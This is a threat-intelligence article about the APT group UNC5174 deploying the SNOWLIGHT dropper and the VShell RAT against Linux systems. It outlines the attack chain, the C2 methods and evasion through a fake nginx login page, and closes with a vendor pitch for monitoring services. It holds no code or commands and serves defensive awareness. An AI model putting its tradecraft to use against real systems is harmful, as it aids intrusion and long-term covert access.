The Chinese-linked APT group UNC5174 has been observed deploying an advanced malware toolkit targeting Linux systems, combining a custom downloader known as SNOWLIGHT with a stealthy and powerful remote access trojan called VShell.
What it is about
Originally developed by a Chinese developer under the alias Veo, VShell is a Golang-based RAT tool designed for red teaming and adversary simulation. While its GitHub page has since been taken offline, the tool’s latest known version, 4.9.3, continues circulating in underground communities, often in cracked form with extended license capabilities.
Unlike traditional tools like Cobalt Strike, VShell offers a native web-based interface, cross-platform support (Windows/Linux), and fileless execution capabilities. Once deployed, the attacker gains full control of the infected system, with features including terminal command execution, file browsing, screenshot capture, and persistent backdoor creation.
Modus operandi
According to threat intelligence reports, the attack chain begins with SNOWLIGHT acting as a dropper, executing a malicious bash script that downloads two components: one tied to SNOWLIGHT and another to the open-source Sliver C2 framework. These establish C2 communication and allow the final VShell payload to be delivered via a crafted request.
Notably, VShell uses WebSocket-based C2 channels and disguises its login page using a fake nginx screen to resist detection and scanning. Once inside, operators can generate a variety of payloads capable of bypassing popular antivirus solutions.
VShell’s strength lies in its stealth, usability, and native Linux support, positioning it as a favored tool in modern cyber operations. The tool is now actively used by Chinese-speaking actors for initial access, lateral movement, and long-term persistence in Linux environments.
Attacks without distinction
With the increasing spread of open-source offensive tools, their misuse by nation-state-sponsored actors blurs the boundaries between state and criminal operations, greatly complicating attribution processes.
For this reason, it becomes imperative to equip oneself with 24-hour monitoring and response systems and Threat Intelligence, capable of scanning for both internal and external threats.
Analysis by Vasily Kononov – Threat Intelligence Lead, CYBEROO
